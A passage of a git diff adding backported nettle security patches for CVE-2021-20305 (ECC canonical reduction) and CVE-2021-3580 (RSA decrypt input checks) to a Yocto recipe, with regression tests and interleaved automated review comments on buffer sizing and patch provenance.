*/ + void + ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp, +Index: nettle-3.5.1/ecc-j-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-j-to-a.c ++++ nettle-3.5.1/ecc-j-to-a.c +@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc, + #define izBp (scratch + 3*ecc->p.size) + #define tp scratch + +- mp_limb_t cy; +- + if (ecc->use_redc) + { + /* Set v = (r_z / B^2)^-1, +@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc, + ecc_modp_sqr (ecc, iz2p, izp); + } + +- ecc_modp_mul (ecc, iz3p, iz2p, p); +- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so +- do a conditional subtraction. */ +- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, iz3p, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p); + + if (op) + { + /* Skip y coordinate */ + if (op > 1) + { ++ mp_limb_t cy; + /* Also reduce the x coordinate mod ecc->q. It should + already be < 2*ecc->q, so one subtraction should + suffice. */ +@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc, + return; + } + ecc_modp_mul (ecc, iz3p, iz2p, izp); +- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size); +- /* And a similar subtraction. 
*/ +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p); + + #undef izp + #undef up +Index: nettle-3.5.1/ecc-mod-arith.c +=================================================================== +--- nettle-3.5.1.orig/ecc-mod-arith.c ++++ nettle-3.5.1/ecc-mod-arith.c +@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m, + } + + void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_mul_n (tp + m->size, ap, bp, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void ++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_sqr (tp + m->size, ap, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void + ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp, + const mp_limb_t *ap) + { diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch new file mode 100644 index 0000000000..bb56b14c8c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch 
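Review bot: `ecc_mod_mul_canonical` and `ecc_mod_sqr_canonical` in ecc-mod-arith.c build the double-width product at `tp + m->size`, so `tp` has to provide 3*m->size limbs, and the comment added to ecc-internal.h never states that. This layout is what allows the scratch to alias an operand (ecc-j-to-a.c passes `iz3p` as both `ap` and `tp`), but it also raises the scratch each caller must supply. In CVE-2021-20305-2.patch, `equal_h` passes `t1`, defined as `scratch + p->size`, as `tp`, which reaches 4*p->size limbs into `scratch`; the allocation is outside these hunks, so it should be checked at the call sites. I would put the contract in the header, e.g. `/* tp must hold 3*m->size limbs; the product is built at tp + m->size. */`.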
@@ -0,0 +1,53 @@ +Backport of: + +From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 17:26:37 +0100 +Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison. + +* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. + +(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch +CVE: CVE-2021-20305 dep2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 4 ++++ + eddsa-verify.c | 9 ++------- + 2 files changed, 6 insertions(+), 7 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5cc5c188..2a9217a6 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,7 @@ +#+2021-03-13 Niels Möller <nisse@lysator.liu.se> +#+ +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ +# 2021-03-11 Niels Möller <nisse@lysator.liu.se> +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/eddsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-verify.c ++++ nettle-3.5.1/eddsa-verify.c +@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p, + #define t0 scratch + #define t1 (scratch + p->size) + +- ecc_mod_mul (p, t0, x1, z2); +- if (mpn_cmp (t0, p->m, p->size) >= 0) +- mpn_sub_n (t0, t0, p->m, p->size); +- +- ecc_mod_mul (p, t1, x2, z1); +- if (mpn_cmp (t1, p->m, p->size) >= 0) +- mpn_sub_n (t1, t1, p->m, p->size); ++ ecc_mod_mul_canonical (p, t0, x1, z2, t0); ++ ecc_mod_mul_canonical (p, t1, x2, z1, t1); + + return mpn_cmp (t0, t1, p->size) == 0; + diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch new file mode 100644 index 0000000000..15a892ecdf --- /dev/null 
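Review bot: Both calls in equal_h pass their own destination as the scratch argument (`ecc_mod_mul_canonical (p, t1, x2, z1, t1)`), and nothing in the hunk states how much room that needs. As the helper is defined in the preceding patch on this page, the double-width product is stored at `tp + m->size`, so the t1 call touches limbs up to `scratch + 4*p->size`. The size of equal_h's scratch is not visible here, and its body continues past the hunk. The same question applies to the `u1`/`u2` calls in ecc_ecdsa_verify and the `tp` call in ecc_ecdsa_sign in the later patches of this series. I would add a comment above the helper, `/* tp must hold 3*m->size limbs; rp may equal tp. */`, and confirm that each caller's scratch allocation covers it.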
+++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch 
@@ -0,0 +1,122 @@ +Backport of: + +From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 15:19:19 +0100 +Subject: [PATCH] Fix bug in ecc_ecdsa_verify. + +* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +to compute the scalars used for ecc multiplication. +* testsuite/ecdsa-verify-test.c (test_main): Add test case that +triggers an assert on 64-bit platforms, without above fix. +* testsuite/ecdsa-sign-test.c (test_main): Test case generating +the same signature. + +(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch +CVE: CVE-2021-20305 dep3 +[Minor fixup on _nettle_secp_224r1] +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 10 +++++++++- + ecc-ecdsa-verify.c | 4 ++-- + testsuite/ecdsa-sign-test.c | 13 +++++++++++++ + testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++ + 4 files changed, 44 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 2a9217a6..63848f53 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,7 +1,15 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +#+ to compute the scalars used for ecc multiplication. +#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that +#+ triggers an assert on 64-bit platforms, without above fix. +#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating +#+ the same signature. +#+ +#+2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. 
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se> +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/ecc-ecdsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/ecc-ecdsa-verify.c ++++ nettle-3.5.1/ecc-ecdsa-verify.c +@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve + + /* u1 = h / s, P1 = u1 * G */ + ecc_hash (&ecc->q, hp, length, digest); +- ecc_modq_mul (ecc, u1, hp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1); + + /* u2 = r / s, P2 = u2 * Y */ +- ecc_modq_mul (ecc, u2, rp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2); + + /* Total storage: 5*ecc->p.size + ecc->mul_itch */ + ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size); +Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c ++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c +@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Producing the signature for corresponding test in ++ ecdsa-verify-test.c, with special u1 and u2. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "99b5b787484def12894ca507058b3bf5" ++ "43d72d82fa7721d2e805e5e6", ++ "2", ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* Test cases for the smaller groups, verified with a + proof-of-concept implementation done for Yubico AB. 
*/ + test_ecdsa (&_nettle_secp_192r1, +Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c ++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c +@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Corresponds to nonce k = 2 and private key z = ++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and ++ hash are chosen so that intermediate scalars in the verify ++ equations are u1 = 0x6b245680e700, u2 = ++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical ++ reduction of the scalars. Bug caused by missing canonical ++ reduction reported by Guido Vranken. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "9e7e6cc6b1bdfa8ee039b66ad85e5490" ++ "7be706a900a3cba1c8fdd014", /* x */ ++ "74855db3f7c1b4097ae095745fc915e3" ++ "8a79d2a1de28f282eafb22ba", /* y */ ++ ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* From RFC 4754 */ + test_ecdsa (&_nettle_secp_256r1, + "2442A5CC 0ECD015F A3CA31DC 8E2BBC70" diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch new file mode 100644 index 0000000000..54b4fa584c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch 
@@ -0,0 +1,48 @@ +Backport of: + +From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 16:27:50 +0100 +Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced. + +* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +canonical range. + +(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch +CVE: CVE-2021-20305 dep4 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 3 +++ + ecc-ecdsa-sign.c | 3 +-- + 2 files changed, 4 insertions(+), 2 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 63848f53..fb2d7f66 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +#+ canonical range. +#+ +# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# * testsuite/ecdsa-verify-test.c (test_main): Add test case that +--- a/ecc-ecdsa-sign.c ++++ b/ecc-ecdsa-sign.c +@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve * + + ecc_modq_mul (ecc, tp, zp, rp); + ecc_modq_add (ecc, hp, hp, tp); +- ecc_modq_mul (ecc, tp, hp, kinv); ++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp); + +- mpn_copyi (sp, tp, ecc->p.size); + #undef P + #undef hp + #undef kinv diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch new file mode 100644 index 0000000000..468ff66266 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch 
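Review bot: The removed `mpn_copyi (sp, tp, ecc->p.size)` filled ecc->p.size limbs of sp, while the replacement `ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp)` writes only `m->size` limbs, which here is ecc->q.size. The two are equivalent only if both sizes are equal for every supported curve, which this hunk does not show. If that is an invariant, `assert (ecc->p.size == ecc->q.size);` before the call would record it. ecc_ecdsa_sign starts and ends outside the hunk.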
@@ -0,0 +1,53 @@ +Backport of: + +From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 16:42:21 +0100 +Subject: [PATCH] Similar fix for eddsa. + +* eddsa-hash.c (_eddsa_hash): Ensure result is canonically +reduced. Two of the three call sites need that. + +(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288) + + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch +CVE: CVE-2021-20305 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 3 +++ + eddsa-hash.c | 10 +++++++--- + 2 files changed, 10 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5f8a22c2..ce330831 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically +#+ reduced. Two of the three call sites need that. +#+ +# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# +Index: nettle-3.5.1/eddsa-hash.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-hash.c ++++ nettle-3.5.1/eddsa-hash.c +@@ -46,7 +46,12 @@ void + _eddsa_hash (const struct ecc_modulo *m, + mp_limb_t *rp, const uint8_t *digest) + { ++ mp_limb_t cy; + size_t nbytes = 1 + m->bit_size / 8; + mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes); + m->mod (m, rp); ++ mpn_copyi (rp + m->size, rp, m->size); ++ /* Ensure canonical reduction. */ ++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, rp + m->size, m->size); + } diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch new file mode 100644 index 0000000000..ac3a638e72 --- /dev/null 
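Review bot: The provenance in this patch header does not line up with the file name: the file is CVE-2021-20305-5.patch, but the Upstream-Status URL points at Debian's CVE-2021-20305-6.patch, and the header gives no reason for the gap. The commented-out ChangeLog context mentions an ecc-gostdsa-verify.c change, so presumably Debian's fifth patch covers gostdsa and was dropped for 3.5.1, but that is inferred. A header line such as `[Debian CVE-2021-20305-5.patch not carried: <reason>]` would let someone auditing the CVE fix set confirm that nothing was lost. The `CVE:` tag here also lacks the `depN` suffix used by patches 2 to 4, which is worth making consistent.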
+++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch 
@@ -0,0 +1,277 @@ +From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Tue, 8 Jun 2021 21:31:39 +0200 +Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size. + +Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug. + +(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c) + +Upstream-Status: Backport +CVE: CVE-2021-3580 dep#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 17 +++++++++- + rsa-decrypt-tr.c | 7 ++--- + rsa-internal.h | 4 +-- + rsa-sec-decrypt.c | 9 ++++-- + rsa-sign-tr.c | 61 +++++++++++++++++------------------- + testsuite/rsa-encrypt-test.c | 14 ++++++++- + 6 files changed, 69 insertions(+), 43 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); + TMP_GMP_ALLOC (em, key->size); ++ mpz_limbs_copy(m, gibberish, key_limb_size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, key_limb_size); + +Index: nettle-3.5.1/rsa-internal.h +=================================================================== +--- nettle-3.5.1.orig/rsa-internal.h ++++ nettle-3.5.1/rsa-internal.h +@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p + mp_limb_t *scratch); + + /* Safe side-channel silent variant, using RSA blinding, and checking the +- * result after CRT. */ ++ * result after CRT. In-place calls, with x == m, is allowed. 
*/ + int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn); ++ mp_limb_t *x, const mp_limb_t *m); + + #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */ +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ /* We need a copy because m can be shorter than key_size, ++ * but _rsa_sec_compute_root_tr expect all inputs to be ++ * normalized to a key_size long buffer length */ ++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n)); ++ ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, mpz_size(pub->n)); + +Index: nettle-3.5.1/rsa-sign-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sign-tr.c ++++ nettle-3.5.1/rsa-sign-tr.c +@@ -131,35 +131,34 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) + { ++ mp_size_t nn; + mpz_t mz; + mpz_t xz; + int res; + +- mpz_init(mz); + mpz_init(xz); + +- mpn_copyi(mpz_limbs_write(mz, mn), m, mn); +- mpz_limbs_finish(mz, mn); ++ nn = mpz_size (pub->n); + +- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz); ++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, ++ mpz_roinit_n(mz, m, nn)); + + if (res) +- mpz_limbs_copy(x, xz, mpz_size(pub->n)); ++ mpz_limbs_copy(x, xz, nn); + +- mpz_clear(mz); + 
mpz_clear(xz); + return res; + } + #else + /* Blinds m, by computing c = m r^e (mod n), for a random r. Also +- returns the inverse (ri), for use by rsa_unblind. */ ++ returns the inverse (ri), for use by rsa_unblind. Must have c != m, ++ no in-place operation.*/ + static void + rsa_sec_blind (const struct rsa_public_key *pub, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m, +- mp_size_t mn) ++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m) + { + const mp_limb_t *ep = mpz_limbs_read (pub->e); + const mp_limb_t *np = mpz_limbs_read (pub->n); +@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k + + /* c = m*(r^e) mod n */ + itch = mpn_sec_powm_itch(nn, ebn, nn); +- i2 = mpn_sec_mul_itch(nn, mn); ++ i2 = mpn_sec_mul_itch(nn, nn); + itch = MAX(itch, i2); +- i2 = mpn_sec_div_r_itch(nn + mn, nn); ++ i2 = mpn_sec_div_r_itch(2*nn, nn); + itch = MAX(itch, i2); + i2 = mpn_sec_invert_itch(nn); + itch = MAX(itch, i2); + +- TMP_GMP_ALLOC (tp, nn + mn + itch); +- scratch = tp + nn + mn; ++ TMP_GMP_ALLOC (tp, 2*nn + itch); ++ scratch = tp + 2*nn; + + /* ri = r^(-1) */ + do +@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k + while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch)); + + mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch); +- /* normally mn == nn, but m can be smaller in some cases */ +- mpn_sec_mul (tp, c, nn, m, mn, scratch); +- mpn_sec_div_r (tp, nn + mn, np, nn, scratch); ++ mpn_sec_mul (tp, c, nn, m, nn, scratch); ++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch); + mpn_copyi(c, tp, nn); + + TMP_GMP_FREE (r); +@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k + TMP_GMP_FREE (tp); + } + +-/* m = c ri mod n */ ++/* m = c ri mod n. Allows x == c. 
*/ + static void + rsa_sec_unblind (const struct rsa_public_key *pub, + mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c) +@@ -299,7 +297,7 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) + { + TMP_GMP_DECL (c, mp_limb_t); + TMP_GMP_DECL (ri, mp_limb_t); +@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs + size_t key_limb_size; + int ret; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the + key is invalid and rejected by rsa_private_key_prepare. However, +@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs + } + + assert(mpz_size(pub->n) == key_limb_size); +- assert(mn <= key_limb_size); + + TMP_GMP_ALLOC (c, key_limb_size); + TMP_GMP_ALLOC (ri, key_limb_size); + TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key)); + +- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn); ++ rsa_sec_blind (pub, random_ctx, random, c, ri, m); + +- _rsa_sec_compute_root(key, c, x, scratch); ++ _rsa_sec_compute_root(key, x, c, scratch); + +- ret = rsa_sec_check_root(pub, c, x); ++ ret = rsa_sec_check_root(pub, x, c); + +- rsa_sec_unblind(pub, x, ri, c); ++ rsa_sec_unblind(pub, x, ri, x); + + cnd_mpn_zero(1 - ret, x, key_limb_size); + +@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub + mpz_t x, const mpz_t m) + { + TMP_GMP_DECL (l, mp_limb_t); ++ mp_size_t nn = mpz_size(pub->n); + int res; + +- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); +- TMP_GMP_ALLOC (l, l_size); ++ TMP_GMP_ALLOC (l, nn); ++ mpz_limbs_copy(l, m, nn); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, +- mpz_limbs_read(m), mpz_size(m)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l); + if (res) { +- mp_limb_t 
*xp = mpz_limbs_write (x, l_size); +- mpn_copyi (xp, l, l_size); +- mpz_limbs_finish (x, l_size); ++ mp_limb_t *xp = mpz_limbs_write (x, nn); ++ mpn_copyi (xp, l, nn); ++ mpz_limbs_finish (x, nn); + } + + TMP_GMP_FREE (l); +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,6 +19,7 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; ++ mpz_t zero; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); +@@ -101,6 +102,17 @@ test_main(void) + ASSERT(decrypted[decrypted_length] == after); + ASSERT(decrypted[0] == 'A'); + ++ /* Test zero input. */ ++ mpz_init_set_ui (zero, 0); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, zero)); ++ ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ + mpz_add_ui (key.q, key.q, 2); +@@ -112,6 +124,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); ++ mpz_clear(zero); + free(decrypted); + } +- diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch new file mode 100644 index 0000000000..18e952ddf7 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch 
@@ -0,0 +1,163 @@ +From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Tue, 8 Jun 2021 21:32:38 +0200 +Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions. + +(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe) + +Upstream-Status: Backport +CVE: CVE-2021-3580 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 10 +++++++++- + rsa-decrypt-tr.c | 4 ++++ + rsa-decrypt.c | 10 ++++++++++ + rsa-sec-decrypt.c | 4 ++++ + rsa.h | 5 +++-- + testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------ + 6 files changed, 62 insertions(+), 9 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + key_limb_size = 